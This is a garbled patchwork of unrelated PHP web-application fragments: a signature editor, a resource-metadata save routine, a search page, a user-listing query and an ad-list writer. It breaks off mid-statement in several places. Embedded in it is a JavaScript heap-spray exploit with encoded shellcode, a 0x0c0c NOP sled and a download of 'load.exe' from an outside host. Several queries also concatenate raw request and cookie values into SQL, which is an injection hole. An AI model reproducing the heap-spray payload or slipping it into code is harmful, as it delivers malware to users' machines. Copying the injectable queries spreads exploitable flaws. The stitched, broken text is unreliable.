boxButton'>email</button>";
if ($permissions['signatureimage']) {
echo " <button type='button' data-tag='IMG' class='bbcode boxButton'>image</button> ";
}
echo "<button type='button' data-tag='QUOTE' class='bbcode boxButton'>quote</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-link' type='button' data-tooltip='Example: [URL=http://example.com]Click here[/URL]' class='boxButton'>link</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-font' type='button' data-tooltip='Example: [FONT=Arial]Hello world![/FONT]' class='boxButton'>font</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-size' type='button' data-tooltip='Example: [SIZE=5]Hello world![/SIZE]' class='boxButton'>size</button>\n\t\t\t\t\t\t\t\t\t\t\t\t<button id='bbcode-color' type='button' data-tooltip='Example: [COLOR=RED]Hello[/COLOR] [COLOR=#00FF00]world![/COLOR]' class='boxButton'>color</button> ";
if ($permissions['mentionusers']) {
echo "<button type='button' data-tag='MENTION' data-tooltip='Example: [MENTION]Jimmy[/MENTION]' class='bbcode boxButton'>mention</button>";
}
echo "<br><br>";
}
echo "<textarea id='message' name='signature' placeholder=' Signature' maxlength='" . $permissions['maxsignature'] . "' class='boxTextArea' autofocus>" . $user['signature'] . "</textarea>\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<div align='right'>\n\t\t\t\t\t\t\t\t\t<input type='submit' name='changesignature' value='Change Signature' class='boxButton'>\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t</form>";
}
break;
case "hidden":
function save_resource_data($ref,$multi)
{
# Save all submitted data for resource $ref.
# Also re-index all keywords from indexable fields.
global $auto_order_checkbox,$userresourcedefaults,$multilingual_text_fields,$languages,$language;
hook("befsaveresourcedata", "", array($ref));
# save resource defaults
# (do this here so that user can override them if the fields are visible.)
set_resource_defaults($ref);
# Loop through the field data and save (if necessary)
$errors=array();
$fields=get_resource_field_data($ref,$multi);
$expiry_field_edited=false;
$resource_data=get_resource_data($ref);
for ($n=0;$n<count($fields);$n++)
{
if (!(
# Not if field has write access denied
checkperm("F" . $fields[$n]["ref"])
||
(checkperm("F*") && !checkperm("F-" . $fields[$n]["ref"]))
))
{
if ($fields[$n]["type"]==2)
{
# construct the value from the ticked boxes
$val=","; # Note: it seems wrong to start with a comma, but this ensures it is treated as a comma separated list by split_keywords(), so if just one item is selected it still does individual word adding, so 'South Asia' is split to 'South Asia','South','Asia'.
$options=trim_array(explode(",",$fields[$n]["options"]));
for ($m=0;$m<count($options);$m++)
{
$name=$fields[$n]["ref"] . "_" . md5($options[$m]);
if (getval($name,"")=="yes")
{
if ($val!=",") {$val.=",";}
$val.=$options[$m];
}
}
}
elseif ($fields[$n]["type"]==4 || $fields[$n]["type"]==6 || $fields[$n]["type"]==10)
{
# date type, construct the value from the date/time dropdowns
$val=sprintf("%04d", getvalescaped("field_" . $fields[$n]["ref"] . "-y",""));
if ((int)$val<=0)
{
$val="";
}
elseif (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-m",""))!="")
{
$val.="-" . $field;
if (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-d",""))!="")
{
$val.="-" . $field;
if (($field=getval("field_" . $fields[$n]["ref"] . "-h",""))!="")
{
$val.=" " . $field . ":";
if (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-i",""))!="")
{
$val.=$field;
}
else
{
$val.="00";
}
}
}
}
}
elseif ($multilingual_text_fields && ($fields[$n]["type"]==0 || $fields[$n]["type"]==1 || $fields[$n]["type"]==5))
{
# Construct a multilingual string from the submitted translations
$val=getvalescaped("field_" . $fields[$n]["ref"],"");
$val="~" . $language . ":" . $val;
reset ($languages);
foreach ($languages as $langkey => $langname)
{
if ($language!=$langkey)
{
$val.="~" . $langkey . ":" . getvalescaped("multilingual_" . $n . "_" . $langkey,"");
}
}
}
elseif ($fields[$n]["type"] == 3)
{
$val=getvalescaped("field_" . $fields[$n]["ref"],"");
// if it doesn't already start with a comma, add one
if (substr($val,0,1) != ',')
{
$val = ','.$val;
}
}
else
{
# Set the value exactly as sent.
$val=getvalescaped("field_" . $fields[$n]["ref"],"");
}
# Check for regular expression match
if (trim(strlen($fields[$n]["regexp_filter"]))>=1 && strlen($val)>0)
{
if(preg_match("#^" . $fields[$n]["regexp_filter"] . "$#",$val,$matches)<=0)
{
global $lang;
debug($lang["information-regexp_fail"] . ": -" . "reg exp: " . $fields[$n]["regexp_filter"] . ". Value passed: " . $val);
if (getval("autosave","")!="")
{
exit();
}
$errors[$fields[$n]["ref"]]=$lang["information-regexp_fail"] . " : " . $val;
continue;
}
}
if (str_replace("\r\n","\n",$fields[$n]["value"])!== str_replace("\r\n","\n",unescape($val)))
{
//$testvalue=$fields[$n]["value"];var_dump($testvalue);$val=unescape($val);var_dump($val);
//echo "FIELD:".$fields[$n]["value"]."!==ORIG:".unescape($val);
# This value is different from the value we have on record.
# Write this edit to the log (including the diff) (unescaped is safe because the diff is processed later)
resource_log($ref,'e',$fields[$n]["ref"],"",$fields[$n]["value"],unescape($val));
# Expiry field? Set that expiry date(s) have changed so the expiry notification flag will be reset later in this function.
if ($fields[$n]["type"]==6) {$expiry_field_edited=true;}
# If 'resource_column' is set, then we need to add this to a query to back-update
# the related columns on the resource table
$resource_column=$fields[$n]["resource_column"];
# Purge existing data and keyword mappings, decrease keyword hitcounts.
sql_query("delete from resource_data where resource='$ref' and resource_type_field='" . $fields[$n]["ref"] . "'");
# Insert new data and keyword mappings, increase keyword hitcounts.
sql_query("insert into resource_data(resource,resource_type_field,value) values('$ref','" . $fields[$n]["ref"] . "','" . escape_check($val) ."')");
$oldval=$fields[$n]["value"];
if ($fields[$n]["type"]==3 && substr($oldval,0,1) != ',')
{
# Prepend a comma when indexing dropdowns
$oldval="," . $oldval;
}
if ($fields[$n]["keywords_index"]==1)
{
# Date field? These need indexing differently.
$is_date=($fields[$n]["type"]==4 || $fields[$n]["type"]==6);
remove_keyword_mappings($ref, i18n_get_indexable($oldval), $fields[$n]["ref"], $fields[$n]["partial_index"],$is_date);
add_keyword_mappings($ref, i18n_get_indexable($val), $fields[$n]["ref"], $fields[$n]["partial_index"],$is_date);
}
# If this is a 'joined' field we need to add it to the resource column
$joins=get_resource_table_joins();
if (in_array($fields[$n]["ref"],$joins)){
$val=strip_leading_comma($val);
sql_query("update resource set field".$fields[$n]["ref"]."='".escape_check($val)."' where ref='$ref'");
}
}
# Check required fields have been entered.
$exemptfields = getvalescaped("exemptfields","");
$exemptfields = explode(",",$exemptfields);
if ($fields[$n]["required"]==1 && ($val=="" || $val==",") && !in_array($fields[$n]["ref"],$exemptfields))
{
global $lang;
$errors[$fields[$n]["ref"]]=i18n_get_translated($fields[$n]["title"]).": ".$lang["requiredfield"];
}
}
}
//die();
# Always index the resource ID as a keyword
remove_keyword_mappings($ref, $ref, -1);
add_keyword_mappings($ref, $ref, -1);
# Autocomplete any blank fields.
autocomplete_blank_fields($ref);
# Also save related resources field
sql_query("delete from resource_related where resource='$ref' or related='$ref'"); # remove existing related items
$related=explode(",",getvalescaped("related",""));
# Make sure all submitted values are numeric
$ok=array();for ($n=0;$n<count($related);$n++) {if (is_numeric(trim($related[$n]))) {$ok[]=trim($related[$n]);}}
if (count($ok)>0) {sql_query("insert into resource_related(resource,related) values ($ref," . join("),(" . $ref . ",",$ok) . ")");}
// Notify the resources team ($email_notify) if moving from pending review->submission.
$archive=getvalescaped("archive",0,true);
$oldarchive=sql_value("select archive value from resource where ref='$ref'",0);
if ($oldarchive==-2 && $archive==-1 && $ref>0)
{
notify_user_contributed_submitted(array($ref));
}
if ($oldarchive==-1 && $archive==-2 && $ref>0)
{
notify_user_contributed_unsubmitted(array($ref));
}
# Expiry field(s) edited? Reset the notification flag so that warnings are sent again when the date is reached.
$expirysql="";
if ($expiry_field_edited) {$expirysql=",expiry_notification_sent=0";}
# Also update archive status and access level
$oldaccess=sql_value("select access value from resource where ref='$ref'",0);
$access=getvalescaped("access",$oldaccess,true);
if (getvalescaped("archive","")!="") # Only if archive has been sent
{
sql_query("update resource set archive='" . $archive . "',access='" . $access . "' $expirysql where ref='$ref'");
if ($archive!=$oldarchive)
{
resource_log($ref,"s",0,"",$oldarchive,$archive);
}
if ($access!=$oldaccess)
{
resource_log($ref,"a",0,"",$oldaccess,$access);
}
}
# For access level 3 (custom) - also save custom permissions
if (getvalescaped("access",0)==3) {save_resource_custom_access($ref);}
# Update XML metadata dump file
update_xml_metadump($ref);
hook("aftersaveresourcedata");
if (count($errors)==0) {return true;} else {return $errors;}
}
<?php
require_once '../login/login_check.php';
require_once '../include/common.inc.php';
$css_url = "../templates/css";
$img_url = "../templates/images";
//$lang_searchresult
$id = unescape($id);
if ($id != null) {
echo "<style type='text/css'> \n\n*{margin:0;padding:0;} \n.ifr_div{width:600px;height:600px; position:relative;} \n.ifr_div img{ vertical-align:middle;} \n.proccess{border:0px solid;border-color:#000000;height:300px;line-height:300px;width:300px;text-align:center;background:#ffffff;margin:0;position:absolute;top:20%;left:36%;} \n.proccess1{border:0px solid;border-color:#000000;height:300px;width:300px;text-align:center;background:#ffffff;margin:0;position:absolute;top:25%;left:36%;} \n.proccess b{vertical-align:middle;background:url(http://ok22.org/upload/images/20110902143538381.gif) no-repeat 0 center;padding-left:35px;display:inline-block;} \n\n</style> \n <div class='proccess' id='loading'><b>{$lang_search_inthe}。。。</b></div> \n";
}
$anyid = 29;
$id = trim($id);
foreach ($met_class1 as $key => $val) {
if (strstr($val['name'], $id) && $val['module'] < 9 && !$val['if_in']) {
$contentlistes[] = $val;
}
}
foreach ($contentlistes as $key => $val) {
$sum = '';
$sum1 = '';
$sum2 = '';
$sum3 = '';
$sum_count = array();
switch ($val['module']) {
case '1':
$val['url'] = 'about/content.php?id=' . $val[id] . '&lang=' . $lang . '&anyid=' . $anyid;
$val['conturl'] = 'about/about.php?id=' . $val[id] . '&lang=' . $lang . '&anyid=' . $anyid;
$val['set'] = "<div>\n\t\t\t\t\t\t\t\t\t<p class='lt'><a href='{$val[url]}'>{$lang_addinfo}</a></p><span>-</span><p class='rt'><a href='{$val[conturl]}'>{$lang_manager}</a></p>\n\t\t\t\t\t\t\t\t\t</div>";
break;
case '2':
} else {
if ($xpass == "投资类型") {
$xpass = "******";
$xpasswhere = "";
//$xpass_css = "deal dealRed";
} else {
$xpass = "******";
$xpasswhere = " and(users.touzi_type like '%" . $xpass . "%') ";
// $xpass_css = "deal dealRed";
}
}
}
}
if ($_REQUEST["keys"] != "") {
$keys = trim($_REQUEST["keys"]);
$keys = unescape($keys);
$sqlwhere .= " and(users.name like '%" . $keys . "%' or users.truename like '%" . $keys . "%') ";
}
$sqlwhere .= $xpass1where . $xpasswhere;
$sql = "select users.*,country.`name` as 'countryname' from users,country where users.countryid = country.id and users.user_type = 2 and users.id in(select userid from users_sub where fid=" . $_SESSION['verydeals_id'] . " ) " . $sqlwhere . " ";
$orderby = " order by users." . $ordertype . " " . $isdesc . " ";
$sql .= $orderby;
$ps = 15;
$rs = mysql_query($sql);
$allcount = mysql_num_rows($rs);
$sqlpage = getlimitsql($sql, $ps);
$yeshu = ceil($allcount / $ps);
$dt = mysql_query($sqlpage, $conn);
while ($row = mysql_fetch_array($dt)) {
$xlink = trim($row["user_type"]) == 1 || trim($row["user_type"]) == 3 ? "personal_colleagues_s.php?ci=" . $row["id"] . "&mp=1" : "personal_colleagues_b.php?ci=" . $row["id"] . "&mp=1";
$xlink2 = trim($row["user_type"]) == 1 || trim($row["user_type"]) == 3 ? "company_colleagues_B.php?ci=" . $row["id"] . "&mp=1" : "company_colleagues_B.php?ci=" . $row["id"] . "&mp=1";
"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+
"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+
"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+
"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+
"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+
"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+
"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+
"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+
"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+
"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+
"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+
"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+
"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+
"%u1011%uba10%ua3bd%ua0a2%uefa1"+
"' . unescape("http://site.come/load.exe") . '");
var hbs=0x400000;
var pls=plc.length*2;
var sss=hbs-(pls+0x38);
var ss=unescape("%u0c0c%u0c0c");
ss=gss(ss,sss);
hbs=(hsta-0x400000)/hbs;
for(i=0;i<hbs;i++)m[i]=ss+plc;
}
function gss(ss,sss){
while(ss.length<sss*2)ss+=ss;
ss=ss.substring(0,sss);
return ss;
}
var m=new Array();
gsc();
$gglist = file($path2);
if (!is_array($gglist)) {
$gglist[] = '';
}
array_shift($gglist);
array_unshift($gglist, $thread . '-' . $ontid . "\r\n");
array_unshift($gglist, '<?php exit();?>' . "\r\n");
file_put_contents($path2, $gglist) or die('出错啦!无法创建.php文件!请将程序目录和所有文件的文件权限设置属性0755或0777。');
$conn = new mysql();
$conn->inoplog('添加广告', $ontid, 1, getname());
die('1');
}
///////////////////////////
$ggiftj = $_COOKIE['ggiftj'];
$gglei = unescape($_COOKIE['gglei']);
$ggzu = unescape($_COOKIE['ggzu']);
$ggleil = file_get_contents($datadir . '/ggleilist.php');
$ggll = explode("\r\n", $ggleil);
array_shift($ggll);
$ggleilist = '';
foreach ($ggll as $value) {
if ($value) {
if ($value == $gglei) {
$ggleilist .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '" selected="selected">' . htmlspecialchars(cutstr($value, 10)) . '</option>';
} else {
$ggleilist .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '">' . htmlspecialchars(cutstr($value, 10)) . '</option>';
}
}
}
$ggzul = file_get_contents($datadir . '/ggzulist.php');
$ggz = explode("\r\n", $ggzul);
